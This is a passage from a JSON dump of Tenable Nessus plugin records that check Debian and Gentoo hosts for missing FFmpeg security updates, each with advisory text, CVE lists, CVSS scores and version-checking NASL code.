attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4502\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ffmpeg packages.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 7:4.1.4-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"ffmpeg\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ffmpeg-doc\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec-extra\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec-extra58\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavcodec58\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavdevice-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavdevice58\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter-extra\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter-extra7\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavfilter7\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavformat-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavformat58\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavresample-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavresample4\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavutil-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libavutil56\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libpostproc-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libpostproc55\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswresample-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswresample3\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswscale-dev\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libswscale5\", reference:\"7:4.1.4-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:06:26", "description": "Two vulnerabilities have been discovered in ffmpeg, a widely used multimedia framework.\n\nCVE-2019-17539\n\na NULL pointer dereference and possibly unspecified other impact when there is no valid close function pointer\n\nCVE-2020-35965\n\nan out-of-bounds write because of errors in calculations of when to perform memset zero operations\n\nFor Debian 9 stretch, these problems have been fixed in version 7:3.2.15-0+deb9u2.\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-01T00:00:00", "type": "nessus", "title": "Debian DLA-2537-1 : ffmpeg security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-17539", "CVE-2020-35965"], "modified": "2021-02-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ffmpeg", "p-cpe:/a:debian:debian_linux:ffmpeg-doc", "p-cpe:/a:debian:debian_linux:libav-tools", "p-cpe:/a:debian:debian_linux:libavcodec-dev", "p-cpe:/a:debian:debian_linux:libavcodec-extra", "p-cpe:/a:debian:debian_linux:libavcodec-extra57", "p-cpe:/a:debian:debian_linux:libavcodec57", "p-cpe:/a:debian:debian_linux:libavdevice-dev", "p-cpe:/a:debian:debian_linux:libavdevice57", "p-cpe:/a:debian:debian_linux:libavfilter-dev", "p-cpe:/a:debian:debian_linux:libavfilter-extra", "p-cpe:/a:debian:debian_linux:libavfilter-extra6", "p-cpe:/a:debian:debian_linux:libavfilter6", "p-cpe:/a:debian:debian_linux:libavformat-dev", "p-cpe:/a:debian:debian_linux:libavformat57", "p-cpe:/a:debian:debian_linux:libavresample-dev", "p-cpe:/a:debian:debian_linux:libavresample3", "p-cpe:/a:debian:debian_linux:libavutil-dev", "p-cpe:/a:debian:debian_linux:libavutil55", "p-cpe:/a:debian:debian_linux:libpostproc-dev", "p-cpe:/a:debian:debian_linux:libpostproc54", "p-cpe:/a:debian:debian_linux:libswresample-dev", "p-cpe:/a:debian:debian_linux:libswresample2", "p-cpe:/a:debian:debian_linux:libswscale-dev", "p-cpe:/a:debian:debian_linux:libswscale4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2537.NASL", "href": "https://www.tenable.com/plugins/nessus/145724", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2537-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145724);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/04\");\n\n script_cve_id(\"CVE-2019-17539\", \"CVE-2020-35965\");\n\n script_name(english:\"Debian DLA-2537-1 : ffmpeg security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Two vulnerabilities have been discovered in ffmpeg, a widely used\nmultimedia framework.\n\nCVE-2019-17539\n\na NULL pointer dereference and possibly unspecified other impact when\nthere is no valid close function pointer\n\nCVE-2020-35965\n\nan out-of-bounds write because of errors in calculations of when to\nperform memset zero operations\n\nFor Debian 9 stretch, these problems have been fixed in version\n7:3.2.15-0+deb9u2.\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/01/msg00026.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/ffmpeg\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ffmpeg-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-extra6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libpostproc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libpostproc54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ffmpeg\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ffmpeg-doc\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libav-tools\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-extra\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-extra57\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec57\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavdevice-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavdevice57\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-extra\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-extra6\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter6\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavformat-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavformat57\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavresample-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavresample3\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavutil-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavutil55\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libpostproc-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libpostproc54\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswresample-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswresample2\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswscale-dev\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswscale4\", reference:\"7:3.2.15-0+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:53:13", "description": "Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-18T00:00:00", "type": "nessus", "title": "Debian DSA-4249-1 : ffmpeg - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10001", "CVE-2018-12458", "CVE-2018-13300", "CVE-2018-13302", "CVE-2018-6392", "CVE-2018-6621", "CVE-2018-7557"], "modified": "2018-11-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ffmpeg", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4249.NASL", "href": "https://www.tenable.com/plugins/nessus/111141", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4249. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111141);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:47\");\n\n script_cve_id(\"CVE-2018-10001\", \"CVE-2018-12458\", \"CVE-2018-13300\", \"CVE-2018-13302\", \"CVE-2018-6392\", \"CVE-2018-6621\", \"CVE-2018-7557\");\n script_xref(name:\"DSA\", value:\"4249\");\n\n script_name(english:\"Debian DSA-4249-1 : ffmpeg - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4249\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ffmpeg packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 7:3.2.11-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ffmpeg\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ffmpeg-doc\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libav-tools\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-extra\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec-extra57\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavcodec57\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavdevice-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavdevice57\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-extra\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter-extra6\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavfilter6\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavformat-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavformat57\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavresample-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavresample3\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavutil-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libavutil55\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libpostproc-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libpostproc54\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswresample-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswresample2\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswscale-dev\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libswscale4\", reference:\"7:3.2.11-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T21:21:52", "description": "The remote host is affected by the vulnerability described in GLSA-202007-58 (FFmpeg: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in FFmpeg. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-30T00:00:00", "type": "nessus", "title": "GLSA-202007-58 : FFmpeg: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-13312", "CVE-2019-15942", "CVE-2020-12284", "CVE-2020-13904", "CVE-2020-14212"], "modified": "2020-08-03T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ffmpeg", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202007-58.NASL", "href": "https://www.tenable.com/plugins/nessus/139121", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202007-58.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139121);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/03\");\n\n script_cve_id(\"CVE-2019-13312\", \"CVE-2019-15942\", \"CVE-2020-12284\", \"CVE-2020-13904\", \"CVE-2020-14212\");\n script_xref(name:\"GLSA\", value:\"202007-58\");\n\n script_name(english:\"GLSA-202007-58 : FFmpeg: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202007-58\n(FFmpeg: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in FFmpeg. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202007-58\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All FFmpeg users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/ffmpeg-4.2.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/ffmpeg\", unaffected:make_list(\"ge 4.2.4\"), vulnerable:make_list(\"lt 4.2.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 